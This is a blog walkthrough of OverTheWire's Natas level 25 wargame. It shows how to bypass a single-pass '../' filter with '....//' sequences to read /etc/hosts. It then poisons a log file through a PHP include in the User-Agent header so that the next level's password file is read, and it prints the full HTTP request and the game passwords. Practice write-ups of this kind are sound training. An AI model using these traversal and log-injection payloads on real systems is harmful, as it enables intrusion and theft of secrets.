Natas · OverTheWire

Natas Level 25 → Level 26

Level 25

Username : natas25
Password :GHF6X7YwACaYYssHVY05cFq83hRktl4c


To solve this level, we first log into the natas25 application using the credentials provided above.

7-10-2017 1-15-06 PM.png

The application provides us with an quoteand the ability to change the language of the quote displayed. Let’s check the source code to learn more about the application.

7-10-2017 1-16-43 PM.png

The application utilizes the following functions:


The setLanguage() function is used to include a file by calling the safeinclude() function. safeinclude() function checks for path traversal by replacing ” ../ ” with a blank, thereby, removing all the occurrences of ” ../ ” in the filename. However, since this pass is only run once, we can create a string that after being passed through the safeinclude() will create an actual filename.

To request access to file /etc/hosts. We will need to first traverse to the /directory and then request for /ets/hosts.
Consider the following filename " ....//....//....//....//etc/hosts ". On being passed through the function, the application creates an actual filepath for us.
../../../../etc/hosts is a valid path and application prints the information in the file.

7-10-2017 12-25-06 PM.png

safeinclude() function also checks if the filename contains ” natas_webpass “, therefore, trying to access the password file for next round cause the application to exit.

7-10-2017 1-50-10 PM.png

Therefore, we need to find another way to inject our commands into the application. On careful inspection, we can see that the logRequest() function also inserts information about our browser’s user-agent. This information is controlled by us and the function does not run any checks on the integrity of the input. Therefore, if we can include our own PHP script, the application will execute that and we might be able to retrieve the password for the next level.

The logRequest() function stores information about the request at ” /var/www/natas/natas25/logs/natas25_ session_id() .log “. The value of session_id() is controlled by us as it’s the value of PHPSESSID. If we can include our password file in the log and then request to read the log file, we will be able to attain the password. Since I’m using Burp Proxy, I requested the following to get the password.

GET /?lang=....//logs/natas25_ST.log HTTP/1.1
Authorization: Basic bmF0YXMyNTpHSEY2WDdZd0FDYVlZc3NIVlkwNWNGcTgzaFJrdGw0Yw==
Upgrade-Insecure-Requests: 1
User-Agent: <? include "/etc/natas_webpass/natas26" ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close
Content-Length: 0

The User-Agent field is used to read the password file and the contents are put into /var/www/natas/natas25/logs/natas25_ST.log . You can create your own value of PHPSESSID, however, make sure to use the same value while creating the path.

7-10-2017 2-01-35 PM.png

As we can see above, the application responds with the password for next level.

Level 26

Username : natas26
Password : oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s